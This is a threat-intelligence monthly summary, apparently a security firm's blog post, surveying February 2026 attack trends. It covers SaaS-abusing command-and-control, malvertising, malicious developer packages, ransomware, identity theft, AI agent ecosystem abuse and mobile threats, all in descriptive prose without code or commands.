Monthly Wrap

William Elchert

William Elchert

6 min read
Monthly Wrap
MONTHLY WRAP MONTHLY WRAP

Overview

February reinforced a consistent operational reality, which suggests attackers are gaining access and staying hidden by abusing trusted services and normal workflows more often than by relying on novel exploitation. This month featured stealthy “legitimate-functionality” tradecraft, including PRC-nexus abuse of the Google Sheets API for command-and-control (GRIDTIDE), commercialized Google Ads cloaking that routes real users to phishing or drainer infrastructure, and authenticated-looking spam delivered through Jira Cloud automation. At the same time, developer ecosystems remained a high-tempo intrusion path, with malicious npm and NuGet packages, repo-based lures, compromised extension publishers, and selective update-channel compromise creating execution risk during routine installs, builds, and updates. Ransomware and extortion activity continued to optimize for speed and resilience by leveraging cross-platform capabilities, offline-capable encryption modes, defense-disruption techniques, and increased use of legitimate remote management tooling for persistence. Finally, mobile threats expanded across banking fraud, spyware, and firmware-level compromise, while AI platforms and agent ecosystems emerged as both enabling infrastructure and high-value targets.

  • Trusted services are being repurposed as intrusion infrastructure: GRIDTIDE used the Google Sheets API as command-and-control to blend into routine SaaS traffic, while Jira Cloud automation enabled authenticated, platform-originated spam delivery. Commodity downloaders and campaigns continued leaning on mainstream cloud hosting for payload staging and retrieval, reducing the value of domain reputation alone.
  • Malvertising and cloaking matured into a commercial enablement layer: 1Campaign operationalized Google Ads abuse by reliably presenting benign pages to reviewers while routing real users to phishing and drainer infrastructure. This model increases campaign lifespan and scale by suppressing researcher and scanner visibility through aggressive profiling and filtering.
  • Developer ecosystems remained the fastest-moving supply chain risk: Malicious npm packages (ambar-src, buildrunner-dev) executed during installation through lifecycle scripts and escalated into multi-stage, in-memory RAT deployment with steganographic payload delivery. Repo-based lures using Next.js projects and coordinated NuGet packages targeting ASP[.]NET authorization flows reinforced that routine development actions can trigger compromise and downstream production risk.
  • Update and marketplace trust continued to be a direct attack surface: The Open VSX registry incident showed how the compromise of a legitimate publisher identity can push weaponized updates to an established install base. Notepad++ update infrastructure compromise reinforced that selective, intelligence-driven tampering of update channels can bypass endpoint hardening when verification and signing controls are weak or inconsistently enforced.
  • Manual execution of social engineering replaced exploit dependency in multiple chains: ClickFix-style fake verification prompts repeatedly converted a single user action into staged malware execution in enterprise environments. Parallel patterns targeted technical users through terminal paste lures and installer impersonation, including Homebrew-themed credential theft and follow-on stealer deployment.
  • Ransomware operations optimized for resilience, cross-platform impact, and defense disruption: LockBit 5.0 expanded multi-platform capability with hypervisor-focused execution paths, while GLOBAL GROUP ransomware delivered via LNK chains ran in an offline-capable “mute” mode that does not require C2 connectivity. Pre-ransomware intrusion tradecraft also emphasized security control disruption, including BYOVD-style kernel-level EDR interference and persistent access via legitimate remote management tooling.
  • Identity, session, and browser-resident access remained the primary monetization targets: MFA-intercept and session-capture phishing frameworks increased account takeover reliability, while ShinyHunters/SLH-style operations focused on stealing SSO credentials and MFA codes to enroll attacker devices for durable SaaS access. Malicious browser extensions and commodity stealers reinforced that cookies, tokens, and email content remain high-value for extortion, fraud, and lateral movement.
  • AI platforms and agent ecosystems emerged as both tooling and target: Proof-of-concept research showed AI assistants with web-fetch can be coerced into covert C2 relay behavior, complicating detection by blending into normal AI usage patterns. In parallel, OpenClaw/ClawHub skill poisoning, log poisoning, and widespread internet-exposed agent control panels highlighted that misconfiguration and marketplace governance gaps can convert agentic automation into privileged compromise at scale.
  • Mobile threats broadened across financial fraud, surveillance, and supply chain compromise: Android campaigns ranged from device-takeover banking trojans and AI-assisted persistence to mass-distributed RAT ecosystems spread through chat platforms. The mobile threat landscape also included commercially marketed cross-platform spyware and firmware-level backdoors embedded into system components, expanding risk beyond application-layer controls and persisting through resets.

Threat Landscape Overview 

Criminal operations in February 2026 concentrated on high-trust delivery paths and rapid data extraction. Campaigns repeatedly converted routine user and admin behavior into execution events, including malvertising cloaking (1Campaign), which extended the lifespan of Google Ads abuse; ClickFix-style “verification” prompts that drove direct command execution; and repository- and package-based lures that compromised developer endpoints during normal installs, builds, or local testing. Multiple intrusion chains emphasized stealth and resilience over novelty, relying on cloud-hosted staging, in-memory execution, and living-off-the-land tooling. Downstream impact continued to center on credential and session theft, ad-account and financial fraud, and ransomware enablement, including offline-capable encryption behavior (GLOBAL GROUP) and cross-platform targeting and hypervisor disruption (LockBit 5.0). Operator tradecraft also prioritized persistence through legitimate remote management tooling and defense impairment through kernel-level techniques, reinforcing that many intrusions are designed to progress quickly from initial access to enterprise-wide control.

State-aligned and espionage activity reinforced a parallel pattern, such as trusted services and edge visibility points are being weaponized to blend collection into normal traffic and workflows. PRC-nexus tradecraft demonstrated SaaS API abuse for command-and-control (GRIDTIDE via Google Sheets) and network choke-point targeting (DKnife on gateway devices) that can scale surveillance and delivery across multiple downstream endpoints. Iran-aligned activity used event-driven social engineering and modular implants to prioritize long-term access and credential theft, while North Korea-linked operations advanced quieter document-based delivery and, in a financially motivated track, showed increasing integration with established ransomware ecosystems. Broader reporting on defense industrial base targeting highlighted that compromise often begins outside traditional enterprise monitoring boundaries, workforce workflows, personal devices, suppliers, and internet-facing infrastructure, then transitions to credential-driven access and low-noise collection through legitimate administrative paths.

Industries Targeted

  • Government entities: Confirmed UNC2814 intrusions included government organizations across multiple regions, and additional activity reflected continued state-aligned focus on administrative access, credential theft, and low-noise collection rather than disruptive outcomes.
  • Software development and software supply chain: Multiple February events directly targeted developer environments and build ecosystems, including malicious npm packages (ambar-src; buildrunner-dev), malicious Next.js repositories, coordinated NuGet packages that can alter ASP[.]NET authorization behavior, and a compromise of trusted extension distribution (Open VSX).
  • Healthcare: North Korea-linked Lazarus subgroup activity operating through the Medusa ransomware ecosystem targeted U.S. healthcare providers, reinforcing the sector’s exposure to identity compromise, lateral movement, and high-pressure extortion.
  • Defense industrial base and suppliers: Reporting highlighted expanding targeting of DIB ecosystems through hiring pipelines, contractor and personal devices, and supplier networks, increasing risk to program-sensitive data even when prime contractor networks are not directly exploited.

Most Active Threat Actors

  • UNC2814 (PRC-nexus espionage): Ran a large-scale campaign using the GRIDTIDE backdoor with Google Sheets API–based command-and-control to blend activity into routine SaaS traffic, primarily targeting telecommunications providers and government entities across dozens of countries.
  • ShinyHunters / “SLH”-labeled crews (eCrime, SaaS extortion): Continued identity-first SaaS intrusions built on SSO credential and MFA code theft, attacker-controlled device enrollment, bulk data access, and follow-on extortion with tightly managed negotiation pressure.
  • GlassWorm (developer ecosystem, supply-chain abuse): Compromised a legitimate Open VSX publisher identity and pushed weaponized updates that used staged loaders and blockchain-based instruction retrieval, with macOS stealer payloads focused on developer and cloud secrets.
  • ClawHavoc / ClawHub malicious-skill operators (AI agent ecosystem): Flooded OpenClaw skill marketplaces with trojanized skills and documentation-driven prerequisite lures to deliver macOS stealers and exfiltrate agent configuration secrets, adapting toward off-platform payload delivery to evade registry defenses.
  • DKnife operator (China-nexus, edge-device compromise): Deployed a gateway-resident interception toolkit to observe and alter network traffic at choke points, enabling credential theft and malware delivery upstream of endpoints.

Hunter Insights

February’s activity shows a structurally shifting threat landscape where “legitimate-functionality abuse” is outpacing novel exploits, meaning defenders must assume cloud APIs, SaaS workflows, and update channels are already hostile terrain. Intrusions are increasingly routed through trusted surfaces, Google Sheets C2 (GRIDTIDE), commercial cloaking for malvertising (1Campaign), developer package ecosystems, and remote-management tooling, while ransomware, identity-centric extortion, and mobile spyware rapidly convert short dwell time into maximum leverage against government, healthcare, software, and DIB targets. At the same time, AI agent marketplaces and skills (OpenClaw/ClawHub) have become both tooling and target, with large-scale skill poisoning and prompt-injection-driven malware delivery demonstrating that “agent supply chain” risk is now on par with npm, NuGet, and extension registries. Collectively, these trends point to a world where compromise often begins outside traditional perimeter visibility, ads, skills, updates, mobile firmware, and then pivots to low-noise credential and session theft for durable SaaS and cloud access.

Looking forward, defenders should expect three reinforcing trajectories: first, wider adoption of API- and SaaS-native C2 (beyond Google Sheets) combined with marketplace cloaking services that industrialize “never-see-the-real-site” malvertising; second, escalating weaponization of AI ecosystems, where poisoned skills, exposed agent panels, and coerced web-enabled assistants serve as both initial access and stealthy relays; and third, deeper convergence of identity and ransomware operations, with session hijacking, MFA interception, and browser-resident theft feeding cross-platform, hypervisor-aware lockers that operate even in offline or segmented environments. To stay ahead, organizations will need to pivot from perimeter-centric controls toward continuous cloud/API telemetry, developer and AI-supply-chain vetting, strong update and identity assurance (FIDO-class phishing-resistant auth, hardened signing), and threat hunting explicitly tuned to detect abuse of “normal” services rather than only anomalous infrastructure.

💡
Hunter Strategy encourages our readers to look for updates in our daily Trending Topics and on Twitter.

Read more